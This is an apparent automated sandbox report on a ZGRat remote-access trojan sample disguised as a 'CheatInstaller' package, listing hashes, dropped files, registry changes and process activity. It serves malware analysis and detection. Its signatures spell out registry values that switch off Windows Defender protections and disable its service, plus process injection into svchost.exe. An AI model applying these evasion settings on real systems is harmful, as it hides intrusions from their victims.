SHA256 0130850b9da0584f54cc20d3dab6365c807e9436ac78e016d5009efa99bd0530
SHA512 724a1e498671494c22ba929060058b5539acd34b839d263c9058a07333cda543d5c77435a0a6f13f76adb2f32bb93fa2683f8089245dbc4c8815bde17168ebb7

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\strip-ansi\index.js

MD5 d2f059d0b9cfa91f1e899a4632d33da8
SHA1 ac06aab8c4ef70f9d2c18bbd0b2eb5ef0bb7c900
SHA256 bf37cd692bf030c2ec270945bc26aa8b19ad379fa5916f12304758f709ab0978
SHA512 0685ed108c20c84b3c0d4bf181318bf3f3ad6602de1b5bb71dc6a8d377575e974c42bcc14f5d72a244f06044bce8f81005c57ec2d246a513b6f196700a5010c2

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\string-width\package.json

MD5 9546c3afdec6c3ee9a51fbb9d614976f
SHA1 a5306c15bba6cb123d9f061ca85eb56576c6638f
SHA256 6457a02418f004fe5d3fbbb19c7cbcc1450a8b887ff9a471dc6985ac83a48d36
SHA512 3e43d7d656ee1029abd5dc6da827db81907d99d60031111d747eb9b7354145e0262c113a061fe343d4020a3cba41fafc620d7d9f27cd2d8035a2af32b7eeab9e

C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\string-width\index.js

MD5 570a2a45ed08d4c933084c566cfa9766
SHA1 e2b122265bccc50b8965d79b07a559a51e74747c
SHA256 ed69ea4f757130e46dc48a0cc31beb6257e61a31c70936d82b8a3f02ffd64df5
SHA512 f0ad29fc99cb379e7bcb2995c18a55da9ada9852456e8da752ecc679e0caf3d0f989d558ba5f041bb02bc02fb88a8c2f8ae7f1a524a2a041b54ec5637c71c121

memory/5368-7264-0x00000000057D0000-0x0000000005A4F000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-18 14:42

Reported

2024-03-18 14:48

Platform

win11-20240214-en

Max time kernel

300s

Max time network

292s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

ZGRat

rat zgrat

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Stops running service(s)

evasion

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1040 set thread context of 7556 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
PID 7556 set thread context of 6348 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Windows\System32\svchost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI90F8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9439.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9119.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF20C2E84709B48809.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D66.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e578f01.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF7D09BE57B9761F46.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D05.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9DA6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9F00.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF1D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9059.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E25.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE302.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI90D7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E14.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIABB0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI90E8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9419.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D46.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9F11.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e578f05.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF1C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE2C1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF4F7892B5D23458AA.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e578f01.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9109.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D35.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE2C2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9408.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9CE5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE2C0.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF1E654603172A86B7.TMP C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
